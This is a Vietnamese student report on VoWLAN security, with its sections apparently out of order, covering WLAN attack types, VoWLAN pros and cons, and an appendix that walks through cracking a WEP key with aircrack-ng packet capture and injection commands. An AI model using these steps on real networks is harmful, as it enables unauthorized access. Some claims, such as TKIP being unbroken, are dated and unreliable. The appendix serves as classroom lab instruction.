Một trong những cách thức tấn công khá phổ biến kiểu truy cập trái phép là tấn công Brute-Force. Kẻ tấn công sử dụng biện pháp thử-sai, xét tất cả các khả năng có thể có của mật khẩu để thử, cho đến khi tìm được mật khẩu chính xác thì thôi. Biện pháp tấn công này có nhiều nhược điểm như đòi hỏi năng lực xử lý của thiết bị phải cao, thời gian tìm ra mật khẩu phụ thuộc vào độ dài và sự phức tạp của mật khẩu.
Hiện nay, với việc sử dụng WPA/WPA2, quá trình xác thực được thực hiện theo cả hai chiều và thông tin dữ liệu trao đổi được bảo đảm an toàn hơn rất nhiều. Cơ chế mã hóa TKIP/RC4 có khả năng chống đỡ rất cao trước các hình thức tấn công mạng. Cho dù kẻ tấn công bằng biện pháp nào đó có thể giả mạo địa chỉ MAC, nắm bắt các gói tin, song thông tin có ích thật sự lại không thể tìm ra được.
Một nguy cơ rất lớn đối với VoWLAN đó chính là việc bị chiếm dụng tài nguyên mạng. Hiện nay có ba phương pháp được sử dụng để đảm bảo tính hợp pháp của thiết bị đầu cuối VoWLAN đó chính là dựa vào địa chỉ MAC, khóa bảo mật và chứng thực số. Tuy nhiên, như chúng ta đã biết địa chỉ MAC có thể bị giả mạo một cách dễ dàng. Trong khi đó khóa bảo mật có thể được sử dụng là WEP hay WPA/WPA2. WEP ngày nay vẫn được sử dụng khá phổ biến do yêu cầu về tính tương thích với thiết bị cũ và thông tin tiêu đề bổ sung của nó nhỏ (cỡ 8 byte so với TKIP là 20 byte). WPA/WPA2 chứng minh được tính bảo mật cao hơn nhiều. Thực tế cho thấy hiện nay chưa có nghiên cứu hay báo cáo nào chỉ ra rằng TKIP/RC4 hay CCMP/AES có thể bị tấn công như đối với WEP. Biện pháp duy nhất để kẻ tấn công lấy được khóa bảo mật đó là bằng con đường social engineering. Cả hai cơ chế bảo mật trên, sử dụng địa chỉ MAC và khóa bảo mật đều không thể đảm bảo tính duy nhất và hợp pháp của thiết bị đầu cuối. Chứng thực số khắc phục được những nhược điểm này. Chứng thực số là số nhận dạng duy nhất đối với từng thiết bị đầu cuối, không thể bị làm giả. Tuy nhiên, nó yêu cầu năng lực xử lý cao của cả đầu cuối client cũng như AP, trong một số trường hợp yêu cầu thêm hệ thống PKI phải được bổ sung vào kiến trúc mạng, tăng thêm độ phức tạp. Việc sử dụng chứng thực số mới chỉ hình thành trên cơ sở lý thuyết. Trên thực tế chưa có một sản phẩm nào mang tính thương mại áp dụng cơ chế này. Hơn thế nữa, do đặc tính di động của đầu cuối VoWLAN, khả năng thiết bị bị mất hay đánh cắp là rất cao.
2.2.3. Tấn công theo kiểu Man-in-the-middle
Tấn công man-in-the-middle là khi kẻ tấn công sử dụng một AP để ánh lừa các node di động kết nối tới AP đó bằng các phát tín hiệu mạnh hơn AP hợp pháp. Quá trình tấn công như sau:
-Kẻ tấn công kích hoạt một AP lên, AP này có thể là máy tính của kẻ tấn công, hoạt động thông qua phần mềm giả lập AP.
-Kẻ tấn công cấu hình AP này có cùng SSID như của mạng WLAN mà nạn nhân đang kết nối tới.
-Sau đó kẻ tấn công sẽ gửi một khung yêu cầu xác thực lại (hoặc tạo ra một nguồn phát tín hiệu lớn gây nhiễu để buộc nạn nhân phải thực hiện kết nối lại), ép nạn nhân tìm kiếm một AP mới để kết nối.
-Bởi vì AP của kẻ tấn công ở gần nạn nhân hơn và tạo ra tín hiệu tốt hơn nên thông thường thiết bị của nạn nhân sẽ chọn kết nối tới AP của kẻ tấn công, trong khi đó nạn nhân vẫn ngỡ mình đang được kết nối tới AP hợp pháp.
Việc kết nối tới AP giả mạo được xem như là một phần của chuyển vùng (roaming) nên người dùng không hề biết được.
Hình 2.7. Tấn công kiểu man-in-the-middle
Kẻ tấn công trước tiên phải sử dụng SSID mà các client đang sử dụng (giá trị này dễ dàng có được), và cũng phải có khóa WEP nếu mạng sử dụng WEP.
Tiếp nữa, kẻ tấn công có thể sử dụng một card mạng thứ hai kết nối với AP hợp pháp, kẻ tấn công sẽ cấu hình cho hai card mạng này hoạt động bridging với nhau. Như vậy, máy của kẻ tấn công chính là người đứng giữa, hoạt động giữa client và AP hợp pháp. Nạn nhân vẫn có thể truy cập Internet hay các dịch vụ khác do AP hợp pháp cung cấp. Trong khi đó, kẻ tấn công có thể thực hiện rất nhiều các hình thức tấn công tới thiết bị của nạn nhân, bao gồm cả hoạt động giám sát thông tin trao đổi.
Với kiểu tấn công này, người dùng rất khó để có thể phát hiện ra. Lượng thông tin mà kẻ tấn công thu thập được phụ thuộc vào thời gian duy trì được trạng thái này. Để chống lại cách tấn công này, cách tốt nhất là sử dụng hệ thống phát hiện xâm nhập (IDS - Intrusion Detection System). Hệ thống này có thể phát hiện ra các dấu hiệu bất thường của mạng và giúp người quản trị xử lý kịp thời.
2.2.4. Tấn công từ chối dịch vụ
Tấn công từ chối dịch vụ DoS có thể chia thành hai loại: DoS lớp vật lý và DoS lớp liên kết dữ liệu.
Tấn công DoS lớp vật lý được thực hiện bằng cách gây nhiễu tín hiệu vô tuyến. Kẻ tấn công có thể sử dụng một thiết bị phát tín hiệu vô tuyến hoạt động trong dải băng tần mà mạng WLAN mục tiêu sử dụng, phát ra tín hiệu với công suất lớn hơn rất nhiều và ở khoảng cách gần AP mục tiêu. Từ đó sẽ gây ra nhiễu vô tuyến, làm cho chất lượng tín hiệu suy giảm rõ rệt, trong trường hợp xấu nhất sẽ làm mất hoàn toàn tín hiệu. Đôi khi trong thực tế cũng có những thiết bị gây nhiễu không nhằm mục đích xấu như lò vi sóng, điện thoại không dây hay các mạng WLAN lân cận hoạt động trong băng tần mà mạng WLAN sử dụng. Tuy nhiên, biện pháp tấn công từ chối dịch vụ DoS lớp vật lý thường không được sử dụng phổ biến do chi phí mua thiết bị gây nhiễu tương đối cao và không tiện dụng, trong khi vẫn có những cách tấn công DoS khác khá hiệu quả, điển hình như tấn công DoS lớp liên kết dữ liệu!
Hình 2.8. Tấn công DoS lớp Vật lý
Tấn công DoS lớp Liên kết dữ liệu được thực hiện bằng nhiều cách, như: phát tràn ngập các khung hủy xác thực hay hủy kết hợp, các khung dữ liệu rỗng, vv… Khi kẻ tấn công phát liên tiếp các khung hủy xác thực và hủy kết hợp, sử dụng địa chỉ MAC giả mạo của AP hợp pháp, thiết bị thu phát tín hiệu của nạn nhân sẽ không thể kêt nối đến AP để gia nhập vào mạng WLAN. Biện pháp tấn công này có hiệu quả cao hơn so với việc sử dụng các khung dữ liệu rỗng. Khi sử dụng phát liên tiếp nhiều khung dữ liệu rỗng trên nhiều card mạng không dây, mục đích của kẻ tấn công là nhằm chiếm dụng băng thông kết nối. Biện pháp này hiệu quả đạt được tỉ lệ thuận với khoảng cách đến thiết bị nạn nhân hoặc AP, công suất phát và số lượng card mạng được sử dụng.
Hình 2.9. Tấn công DoS lớp Liên kết dữ liệu
Một biến thể khác của tấn công từ chối dịch vụ DoS lớp 3 là DDoS. Theo đó, kẻ tấn công sẽ tìm cách xâm nhập và cài đặt các mã độc hại lên nhiều thiết bị trong toàn mạng WLAN bằng con đường phát tán thư rác, dụ dỗ nạn nhân kích vào đường link chứa mã độc hại. Một khi thiết bị nào đó khi đã bị dính mã độc hại này, nó sẽ kích hoạt một chương trình thoại qua VoIP như Yahoo!Messenger hay Skype để tạo ra lưu lượng thoại nhằm mục đích chiếm dụng tài nguyên mạng. Bản thân thiết bị này sau đó cũng có thể trở thành nguồn lây nhiễm thứ cấp cho công việc phát tán mã độc hại. DDoS có sức phá hoại cao hơn DoS nhiều lần.
Triệu chứng dễ nhận thấy nhất khi bị tấn công DoS là sự suy giảm tín hiệu một cách rõ rệt và bất thường. Để khắc phục kiểu tấn công này, có thể sử dụng các thiết bị phân tích phổ tín hiệu nhằm phát hiện ra vị trí các phần tử gây nhiễu sau đó di dời chúng đi nơi khác. Hoặc có thể dùng phương pháp quản trị như chia VLAN, thiết lập Policy. Chia VLAN dựa trên đặc tính của ứng dụng, có thể thiết lập từng VLAN dành riêng cho các kiểu lưu lượng khác nhau như VLAN thoại, VLAN dữ liệu,… Thiết lập Policy cho từng nhóm đối tượng với các quyền hạn truy nhập khác nhau, mức độ ưu tiên chiếm dụng tài nguyên khác nhau.
Kết luận chương 2
Tương tự như WLAN, hệ thống VoWLAN cũng có nhiều nguy cơ bị tấn công. Tuy nhiên, khác với WLAN, việc bảo mật trong hệ thống VoWLAN cần phải được tính toán cân đối giữa hai yếu tố an toàn và tốc độ, bởi vì mạng càng được tăng cường bảo mật thì độ trễ của mạng càng tăng cao, ảnh hưởng đến đường thoại trong mạng.
Chương 3: KẾT LUẬN VỀ CÔNG NGHỆ VOWLAN
3.1. Ưu nhược điểm của công nghệ VoWLAN
Công nghệ VoWLAN ra đời đã là sự kết hợp một cách hài hòa giữa WLAN và VoIP. Cũng chính vì lẽ đó, bên cạnh việc hội tụ những ưu điểm của cả hai công nghệ kể trên nó còn hứng chịu tác động bất lợi cũng chính từ hai công nghệ này mang lại.
3.1.1. Ưu điểm
3.1.1.1. Ưu điểm kế thừa từ công nghệ VoIP
Điện thoại IP ra đời nhằm khai thác tính hiệu quả của các mạng truyền số liệu và tính linh hoạt trong việc phát triển các ứng dụng mới của giao thức IP và làm cho khả năng các dịch vụ được cung cấp trên một mạng thống nhất toàn cầu trở thành hiện thực. VoIP có các ưu điểm chính so với thoại truyền thống như sau:
-Giảm cước dịch vụ điện thoại đường dài.
-Cho phép thực hiện nhiều cuộc gọi hơn, giảm độ rộng băng thông cho mỗi kết nối.
-Hỗ trợ thêm nhiều dịch vụ bổ sung khác và giúp triển khai các dịch vụ mới nhanh chóng, dễ dàng và tự động.
-Sử dụng hiệu quả nhất những ưu thế của giao thức IP là tính mềm dẻo và dễ dàng tương thích.
Ưu điểm nổi bật của dịch vụ VoIP đối với khách hàng là giá cước rẻ hơn nhiều so với thoại truyền thống do các cuộc gọi VoIP sử dụng lượng băng thông rất ít. Trong khi thoại truyền thống sử dụng kỹ thuật số hóa PCM theo chuẩn G.711 với lượng băng thông cố định cho một kênh thoại là 64 kbps thì VoIP sử dụng kiểu mã hóa nguồn như CS-CELP theo chuẩn G.729 yêu cầu tốc độ 8 kbps, hay G.723 chỉ yêu cầu 5.3/6.3 kbps. Như vậy, rõ ràng là lượng băng thông sử dụng đã giảm được một cách đáng kể.
Ngoài ra, do VoIP sử dụng cơ chế triệt khoảng lặng nên có thể tiết kiệm thêm lượng băng thông này để truyền các dạng thông tin khác. Đó là một ưu điểm lớn của VoIP so với điện thoại chuyển mạch kênh truyền thống. Thông thường, băng thông truyền dẫn cần thiết cho một cuộc gọi PSTN có thể sử dụng cho 4 đến 6, thậm chí 8 cuộc gọi VoIP.
Nếu để ý chi phí cho cuộc gọi theo từng phút ta sẽ thấy lượng tiền tiết kiệm được quả là không nhỏ. Tuy nhiên, việc tiết kiệm chi phí còn tùy thuộc vào vùng địa lý và khoảng cách. Đối với các cuộc gọi nội hạt thì việc tiết kiệm này có vẻ không quan trọng, nhưng đối với các cuộc gọi đường dài, nhất là cuộc gọi quốc tế thì nó thật sự là đáng kể. Điều này được thể hiện ở giá cước mà các nhà cung cấp dịch vụ đưa ra, thông thường giảm còn 1/10 đối với các cuộc gọi quốc tế.
Ưu điểm tiếp theo là khả năng quản lý băng thông. Trong mạng điện thoại sử dụng công nghệ chuyển mạch kênh, tài nguyên băng thông cung cấp cho một cuộc gọi là cố định. Trong mạng IP tài nguyên cung cấp cho một cuộc gọi mềm dẻo và linh hoạt hơn nhiều. Khi người sử dụng cần tài nguyên để thực hiện một cuộc gọi, nếu lưu lượng của mạng thấp, băng thông dành cho cuộc gọi sẽ cho chất lượng tốt nhất. Vào thời gian cao điểm, mạng sẽ hạn chế băng thông của từng cuộc gọi ở mức chấp nhận được nhằm phục vụ cùng lúc nhiều người nhất.
Ưu điểm nữa của VoIP là khả năng dễ dàng kết hợp các loại dịch vụ thoại, dữ liệu và video. Thoại và fax chỉ là các ứng dụng khởi đầu cho VoIP, các ứng dụng mong đợi trong tương lai là đa phương tiện và đa dịch vụ. Trong khi tiến hành đàm thoại, người sử dụng có thể vừa nói chuyện vừa sử dụng các dịch vụ khác như truyền file, chia sẻ dữ liệu hay xem hình ảnh của người bên kia.
Mạng Internet đang bùng nổ trên toàn thế giới và ngày càng có nhiều ứng dụng được phát triển trên nền giao thức IP. Việc triển khai VoIP không đòi hỏi nâng cấp cơ sở hạ tầng mạng một cách phức tạp, các thiết bị bổ sung tương đối rẻ và việc cài đặt, bảo dưỡng cũng đơn giản. Đa số các hãng viễn thông lớn trên thế giới như Cisco, Juniper, Alcatel, Siemens, … đều đã cung cấp các giải pháp cả phần cứng và phần mềm hỗ trợ cho VoIP. Các giải pháp này có thể tương thích với hầu hết các chuẩn giao thức hiện nay.
3.1.1.2. Ưu điểm kế thừa từ công nghệ WLAN
Nếu như công nghệ VoIP nói chung giúp cho VoWLAN giải quyết các vấn đề về băng thông và chi phí đầu tư thì công nghệ WLAN lại giải quyết vấn đề về khả năng di động và roaming, một trong những yêu cầu vô cùng quan trọng đối với khách hàng.
Ưu điểm đầu tiên phải kể đến của công nghệ WLAN đó chính là tính năng di động cung cấp cho các thiết bị đầu cuối. Người sử dụng có thể dùng laptop có cài phần mềm hỗ trợ tính năng thiết lập cuộc gọi, ví dụ như Skype chẳng hạn, hay một điện thoại di động cầm tay hoạt động được trong dải tần của sóng wifi. Hiện nay trên thị trường đã xuất hiện rất nhiều mẫu điện thoại hoạt động tốt ở cả hai chế độ (wifi và mạng thông tin di động), hay điện thoại một chế độ wifi. Tất cả các sản phẩm này nhìn chung đều thân thiện với người sử dụng.
Một trong những điểm nổi trội của công nghệ VoWLAN so với VoIP thông thường đó chính là khả năng roaming. Thiết bị đầu cuối ngay cả khi đang trong quá trình đàm thoại vẫn không bị gián đoạn kết nối khi di chuyển từ vung che phủ sóng wifi của AP này sang AP khác. Tuy nhiên, kỹ thuật roaming hiện nay vẫn chưa được chuẩn hóa mang tính quốc tế, các nhà sản xuất tự xây dựng cho mình cách thức để hỗ trợ roaming riêng, do đó, để đảm bảo tính năng này có thể hoạt động tốt thì yêu cầu sử dụng các AP của cùng một nhà sản xuất là rất cần thiết, trong khi chờ đợi chuẩn 802.11r được IEEE thông qua.
Thuận lợi nữa là, thậm chí có nhiều thiết bị cho phép chúng ta thực hiện các cuộc gọi qua Wi-Fi hay mạng di động, với điện thoại có khả năng chuyển từ kết nối này sang kết nối khác một cách nhanh chóng. (Những điện thoại này được gọi là thiết bị FMC – Fixed-Mobile Converenge - Công nghệ mạng hội tụ di động và cố định.) Điều đó có nghĩa là chúng ta có thể bắt đầu một cuộc gọi di động sau đó chuyển tiếp sang mạng wifi mà không bị ngắt kết nối, ngay cả khi trong vùng che phủ của sóng wifi không tồn tại tín hiệu sóng di động.
Đối với các doanh nghiệp lớn, việc sử dụng điện thoại có chức năng VoWLAN chứng tỏ được rất nhiều ưu thế. Đầu tiên đó chính là việc tận dụng được cơ sở hạ tầng mạng máy tính sẵn có, giảm thiểu chi phí đầu tư, tăng cường tính linh hoạt. Việc roaming trong những mô hình mạng cơ lớn như vậy được thực hiện tương đối dễ dàng do quá trình thiết kế mạng đồng bộ và chuyên nghiệp.
Một ưu điểm cuối cùng là thiết bị đầu cuối VoWLAN tương đối nhỏ gọn so với điện thoại để bàn (bao gồm cả công nghệ PSTN và VoIP) hay đơn giản hơn nó có thể chỉ là một phần mềm ứng dụng được tích hợp trên laptop. Kích thước tương đương một máy điện thoại di động thông thường, có khả năng kết nối wifi phục vụ cho nhu cầu thoại và truyền dữ liệu, đó chính là ưu điểm dễ nhận thấy nhất đối với một chiếc điện thoại VoWLAN.
3.1.2. Nhược điểm
3.1.2.1. Các nhược điểm xuất phát từ công nghệ VoIP
Bên cạnh các ưu điểm, VoIP cũng có những nhược điểm đặc trưng của thoại gói như:
-Giao thức IP là không tin cậy và không hỗ trợ QoS.
-Thời gian trễ truyền lan trên mạng có thể vượt quá giới hạn cho phép làm ảnh hưởng đến chất lượng thoại.
-Độ trễ không đồng nhất giữa các gói tin gây ra hiện tượng jitter.
Nhược điểm cơ bản của VoIP so với thoại truyền thống là chất lượng dịch vụ. Nguyên nhân chính gây ra hạn chế về chất lượng dịch vụ là do mạng IP hoạt động theo nguyên tắc nỗ lực tối đa và không tin cậy, tức là nó không đảm bảo chất lượng dịch vụ cho các ứng dụng. Mức độ phức tạp của mạng cũng như chất lượng các kết nối mạng cũng là yếu tố làm giảm chất lượng dịch vụ.
Một yếu tố nữa cũng ảnh hưởng tới chất lượng dịch vụ VoIP là do nó phải chia đường truyền cùng lúc với nhiều dịch vụ khác nhau trên mạng mà không có một đặc trưng riêng biệt nào để các bộ định tuyến có thể nhận biết và xử lý ưu tiên hơn. Tuy trong phần tiêu đề của gói tin IP cũng có các trường để chỉ mức độ ưu tiên, các yêu cầu về độ trễ, số lượng, độ an toàn nhưng do vẫn còn có sự không thống nhất giữa các nhà cung cấp dịch vụ về một số vấn đề nên IP hỗ trợ mức ưu tiên không đồng nhất và không có giao thức định tuyến tham số dịch vụ.
Cũng như các giao thức truyền số liệu khác, thiết kế ban đầu của giao thức IP không phải để truyền các thông tin thời gian thực. Việc truyền tín hiệu thời gian thực trên mạng chuyển mạch gói một cách liên tục với tốc độ không đổi là rất khó thực hiện do các hiện tượng như mất gói hay độ trễ không ổn định. Kỹ thuật truyền lại các gói bị mất hay bị lỗi là không có ý nghĩa đối với các dịch vụ thời gian thực.
Tất cả các ISP đều cố gắng tối thiểu hóa thời gian truyền gói theo khả năng của mình mà không quan tâm đến năng lực của các ISP khác. Vì vậy, nếu các điểm cuối của cuộc gọi VoIP được phục vụ bởi các ISP khác nhau thì rất có thể xảy ra hiện tượng trễ chiều đi và chiều về là khác nhau, hay không đối xứng. Ngoài ra, cơ chế định tuyến của IP có thể gây ra các vòng định tuyến dẫn đến thời gian trễ quá lớn đối với một cuộc gọi thoại, và gói tin mặc dù đến nơi nhưng cũng không còn ý nghĩa nữa.
Để cho chất lượng dịch vụ chấp nhận được, cần phải có một kỹ thuật nén tín hiệu với tỉ số nén lớn, khả năng tái tạo các gói bị thất lạc, và cơ chế bộ đệm nhận các gói ở phía thu để giải quyết vấn đề trễ nối tiếp của các gói trong quá trình truyền lan. Tốc độ xử lý của các bộ mã hóa/giải mã phải nhanh để cuộc gọi không bị gián đoạn. Đồng thời cơ sở hạ tầng mạng cũng phải được nâng cấp lên các công nghệ mới và phải có cơ chế kiểm soát chất lượng dịch vụ.
3.1.2.2. Nhược điểm từ mạng WLAN mang lại
Nhược điểm đầu tiên và lớn nhất phải kể đến của mạng WLAN chính là khả năng bảo mật. Bởi vì môi trường truyền dẫn mà công nghệ này sử dụng là sóng vô tuyến, không hề bị hạn chế đơn giản về mặt vật lý như các mạng có dây khác. Sóng wifi lan truyền tự do trong không gian, kẻ tấn công chỉ cần một thiết bị đầu cuối với anten có độ hướng tính cao là hoàn toàn có thể thu được tín hiệu mặc dù ở khoảng cách địa lý tương đối xa. Hơn nữa việc sử dụng sóng điện từ làm môi trường truyền dẫn cũng rất dễ bị gây nhiễu bởi các nguồn phát khác bao gồm cả vô tình hay cố ý (tấn công DoS vật lý). Nhìn chung, do đặc thù của mạng wifi nên những hạn chế trên là không thể tránh khỏi, chúng ta chỉ có thể hạn chế đến mức tối đa khả năng gây hại của chúng bằng cách sử dụng các biện pháp như mã hóa dữ liệu, dò tìm và cách ly nguồn gây nhiễu, kết hợp với các quy định về pháp luật do Nhà nước ban hành.
Tiếp theo, đó chính là sự hạn chế về mặt băng thông. Với một AP hoạt động theo chuẩn 802.11b chỉ có khả năng phục vụ tốt cho khoảng 12 cuộc gọi đồng thời, không tính đến sự có mặt của các kết nối dữ liệu.Thực tế, các mô hình mạng WLAN luôn là sự kết hợp của cả truyền dẫn dữ liệu và tín hiệu thoại, do đó việc chia tách VLAN cho ít nhất hai dạng tín hiệu này là vô cùng cần thiết. VLAN thoại cần được cài đặt có mức độ ưu tiên cao hơn so với dữ liệu. Hiện nay, IEEE đang xây dựng chuẩn 802.11n cho phép băng thông có thể lên tới 600 Mbps, dự kiến sẽ được thông qua vào đầu năm 2009.
Thứ ba là khả năng roaming tương đối kém. Các AP chỉ có thể hỗ trợ roaming tốt khi thuộc cùng một nhà sản xuất. Hiện tại vẫn chưa có chuẩn chung nào quy định về vấn đề này, các giải pháp đang được sử dụng đều do các hãng tự thiết kế theo giao thức của riêng mình, khả năng thích ứng lẫn nhau là rất kém. Chuẩn 802.11r vẫn đang được IEEE xây dựng để giải quyết vấn đề này. Cho đến khi 802.11r được thông qua thì biện pháp tốt nhất là sử dụng các sản phẩm một cách đồng bộ, của cùng một nhà sản xuất uy tín trên thị trường.
Khả năng chuyển tiếp cuộc gọi giữa mạng Wifi và các mạng không dây khác như GSM, 3G, WiMAX, … cho dù đã và đang được nghiên cứu rất nhiều xong một giải pháp hoàn toàn ổn định và đáng tin cậy vẫn chưa được đưa ra. Tất cả mới chỉ dừng lại ở mức độ thử nghiệm để tiếp tục phát triển.
Sự ra đời của VoWLAN làm cho việc quản lý mạng viễn thông càng trở nên phức tạp hơn. Việc tính cước cuộc gọi sao cho đúng đắn là cả một vấn đề đầy thách thức và nhạy cảm. Một khi người sử dụng thấy được sự tiện dụng và kinh tế mà VoWLAN mang lại, đồng thời khi chất lượng cuộc gọi được cải thiện hơn nữa, thì nó sẽ gây bất lợi cho các nhà cung cấp dịch vụ di động khác nhờ tính cạnh tranh về giá cước của mình.
Cuối cùng, hiện nay, giá thiết bị đầu cuối VoWLAN vẫn còn quá cao so với những gì mà nó mang lại. Một số nhà cung cấp phần cứng như Cisco, Nokia hay nhà cung cấp dịch vụ như Skype, T-Mobile đã tung ra thị trường nhiều dòng sản phẩm hỗ trợ VoWLAN ở cả chế độ đơn hay đa chế độ.
3.2. Tổng kết
Có thể nói VoWLAN không phải là một công nghệ gì đó mang tính đột phá và hoàn toàn mới mẻ. Nó đơn giản chỉ là sự kết hợp mềm dẻo giữa VoIP và WLAN để mang đến sự tiện dụng và chi phí rẻ cho người sử dụng đầu cuối. Một khi hạ tầng mạng WLAN phát triển đầy đủ và phổ biến thì sự ra đời và lớn mạnh của VoWLAN sẽ như một sự tất yếu. Tất nhiên, người ta sẽ không bao giờ bỏ kinh phí ra đầu tư một mạng WLAN tốt chỉ để nhằm mục đích phục vụ cho việc tận dụng công nghệ thoại qua WLAN. VoWLAN chỉ có thể phát triển được một khi mạng WLAN phát triển.
Bởi vì tín hiệu thoại được truyền đi dưới dạng sóng vô tuyến, do đó, VoWLAN phải đối mặt với rất nhiều những nguy cơ tấn công, bao gồm cả vô tình và có mục đích. Khả năng bị nghe lén cuộc gọi là không thể tránh khỏi. Song, nếu được áp dụng các công nghệ và tuân thủ các tiêu chuẩn nghiêm ngặt của các chuẩn quốc tế như IEEE 802.11i hay WPA/WPA2 của Wifi Allience đưa ra thì sẽ giảm thiểu được hầu hết các nguy cơ tấn công này.
Cũng như mọi công nghệ khác, VoWLAN mang trong mình vô số ưu điểm song cũng không tránh khỏi những nhược điểm. Do đó, tương lai của công nghệ không thể đơn giản dự đoán trước được, nó chỉ có thể đứng vững trong cuộc sống một khi được người sử dụng đánh giá cao và thực sự được chấp nhận.
Phụ lục: BẺ KHÓA WEP SỬ DỤNG BACK TRACK 3
I. Chuẩn bị
1.Access Point cấu hình sẵn WEP key 64 bit.
2.PC có card wireless chipset được chương trình aircrack-ng hỗ trợ, xem chi tiết tại http://www.aircrack-ng.org).
3.Hệ điều hành Back Track 3 Final.
II. Các bước thực hiện
Khởi động vào Back Track 3
Chuẩn bị cho card wifi:
Đầu tiên ta bật Monitor Mode trên card wifi. Các câu lệnh như sau:
#airmon-ng (kiểm tra card mạng)
#modprobe -r iwl3945
#modprobe ipwraw
Tiếp theo ta tắt card wifi, thay đổi địa chỉ MAC, rồi bật card wifi lên lại
Tấn công mục tiêu:
Giờ ta xác định một mạng WEP thích hợp:
# airodump-ng wifi0
Ghi chú lại thông tin MAC address (BSSID), channel (CH) và name (ESSID) của mạng muốn tấn công.
Giờ ta thu thập data từ access point để tấn công: dùng airodump-ng để bắt các gói tin:
#airodump-ng -c 6 -w wep --bssid 00:1A:70:34:6F:CC eth0
-c 6 channel 6
-w wep ghi dữ liệu bắt được vào file có tên wep lưu mặc
định trong thư mục home/ của user.
--bssid 00:1D:7E:B0:47:DE giá trị BSSID của AP mục tiêu
Kết quả hiện ra màn hình như sau:
Giờ ta tạo các gói giả mạo đến access point để nó tăng tốc độ dữ liệu đi ra, ta dùng lệnh sau:
#aireplay-ng -1 0 –a 00:1D:7E:B0:47:DE –h 00:11:22:33:44:55 wifi0
Câu lệnh trên thành công, ta dùng lệnh sau để bơm gói tin vào mạng đích:
#aireplay-ng -3 –b 00:1D:7E:B0:47:DE –h 00:11:22:33:44:55 wifi0
Kết quả sau khi bơm gói tin, số lượng gói dữ liệu bắt được tăng lên nhanh chóng!
Khi đã bắt đủ các gói tin (khoảng trên 16000 gói), ta có thể bắt đầu tìm khóa:
Kết quả:
Như vậy ta đã tìm được WEP key là 0123456789
TÀI LIỆU THAM KHẢO
1.Jim Geier, Deploying Voice over Wireless LANs, Cisco Press, 2007
2.Frank Ohrtman, Voice over 802.11, Artech House, 2004
3.Leif Madsen - Jared Smith - Jim Van Meggelen, The Future of Telephony, O'Reilly, 2005
4.TS Trần Công Hùng, VoIP, Học việc Công nghệ BCVT cơ sở HCM, 2006
5.Planet3 Wireless Inc., The Official CWNA Study Guide, 2002
6.Các website liên quan:
http://www.wifipro.org
http://www.vnpro.org
Hệ thống Voice over Wireless-LAN (VoWLAN) là một sự mở rộng của hệ thống VoIP có dây thông thường, nói cách khác, VoWLAN là công nghệ truyền thoại qua môi trường không dây dựa trên giao thức IP. Khi hạ tầng mạng phát triển, WLAN hoàn thiện, nhu cầu di động của người dùng tăng cao, VoWLAN bắt đầu được quan tâm.
1.1. Ứng dụng của VoWLAN
1.1.1. Hệ thống phân phối hay các xí nghiệp sản xuất
Đây chính là một trong những nơi ứng dụng đầu tiên của công nghệ WLAN do tính chất rất khó cài đặt dây cáp mạng LAN thông thường đồng thời lại yêu cầu tính di động tương đối cao. Các kho hàng là nơi đầu tiên dùng WLAN cho mục đích thu thập dữ liệu bằng việc sử dụng máy quét mã vạch. Bên cạnh chức năng cơ bản đó, ngày nay, hầu hết các thiết bị này đều tích hợp thêm chức năng thoại, điển hình là phương thức thoại Push-to-talk.
1.1.2. Trung tâm chăm sóc sức khỏe hay các bệnh viện
Cung cấp khả năng di động cho người sử dụng đầu cuối, đó chính là ưu điểm nổi trội để WLAN nói riêng hay VoWLAN nói chung được chấp nhận trong môi trường khách hàng là các trung tâm chăm sóc sức khỏe. Phạm vi ứng dụng của WLAN trong khu vực này là rất phong phú, từ việc thu thập thông tin về sức khỏe của bệnh nhân đến việc xác định vị trí và trạng thái của các giường cấp cứu. VoWLAN được sử dụng cho mục đích chăm sóc bệnh nhân tốt hơn dành cho các y tá, hay phục vụ mục đích trao đổi thông tin giữa bác sĩ và y tá hay các nhóm làm việc với nhau.
1.1.3. Khách sạn, sân bay, nhà ga, …
Trong các khu vực này, công nghệ wifi thường được sử dụng thay thế cho các đường dây truy nhập ADSL. Khách hàng sẽ có cảm giác tiện dụng hơn khi truy nhập Internet thông qua laptop hay các thiết bị cầm tay tới các AP hơn là phải cắm trực tiếp vào cổng Ethernet thông thường. Việc triển khai cáp mạng ở những nơi như thế này là rất khó khăn và phức tạp. Bên cạnh việc sử dụng mạng WLAN để truyền dữ liệu, chúng ta hoàn toàn có thể cài đặt dịch vụ VoWLAN nhằm tiết kiệm chi phí và đảm bảo một hệ thống đồng bộ, dễ dàng cho công việc quản lý hơn.
1.1.4. Khu vực các trường đại học
Ngày nay, nhu cầu về truy nhập không dây trong các trường đại học là rất lớn. Khách hàng chủ yếu ở đây chính là tầng lớp sinh viên có nhu cầu truy nhập vào các nguồn tài nguyên phục vụ cho công tác nghiên cứu, học tập của nhà trường. Bên cạnh đó, đây cũng chính là thị trường đầy tiềm năng cho VoWLAN phát triển do giá thành rẻ, chất lượng dịch vụ ở mức độ chấp nhận được đối với tầng lớp sinh viên.
1.1.5. Hộ gia đình
Theo thống kê, thiết bị mạng gia đình chiếm khoảng 50% trong tổng số tất cả các sản phẩm WLAN được bán ra trên thị trường. Thực tế, thiết bị đầu cuối VoWLAN thường không được khách hàng sử dụng phổ biến do phải đầu tư thêm chi phí. Thay vào đó, họ chọn cách thức cài đặt phần mềm trên các thiết bị trung gian như điện thoại đa chế độ cầm tay hay laptop có hỗ trợ chức năng thoại. Thường thì với quy mô hộ gia đình, tín hiệu thoại sẽ được đối xử như các loại tín hiệu khác, không có sự cấu hình ưu tiên về lưu lượng hay các yêu cầu về chất lượng tương tư. Nhưng bù lại, việc trao đổi thông tin, chiếm dụng tài nguyên lại rất dễ được kiểm soát do quy mô nhỏ.
1.1.6. Hot Spot và các WISP
Các WISP ngoài việc cung cấp truy nhập không dây thông thường cho người sử dụng, họ còn có thể hỗ trợ thêm về dịch vụ thoại. Việc hỗ trợ thêm này hoàn toàn không bắt buộc đối với các WISP song để cạnh tranh họ thường giới thiệu khả năng này vào mạng lưới của mình. Tương tự với các Hot Spot cũng vậy.
1.1.7. Mạng WMAN topo lưới
Mạng WMAN hiện đang được triển khai ở nhiều nơi trên thế giới. Ví dụ như thủ đô London của nước Anh đã công bố phủ sóng 100% tín hiệu wifi trong toàn thành phố. Để có thể truy nhập vào mạng lưới, người sử dụng phải trả một khoảng phí theo hình thức tính theo giờ, theo dung lượng hoặc thuê bao tháng. Việc triển khai WMAN mang lại mức độ tiện dụng cao và nhiều lợi ích to lớn.
Phần tiếp theo "1.2. Các thành phần của hệ thống VoWLAN"
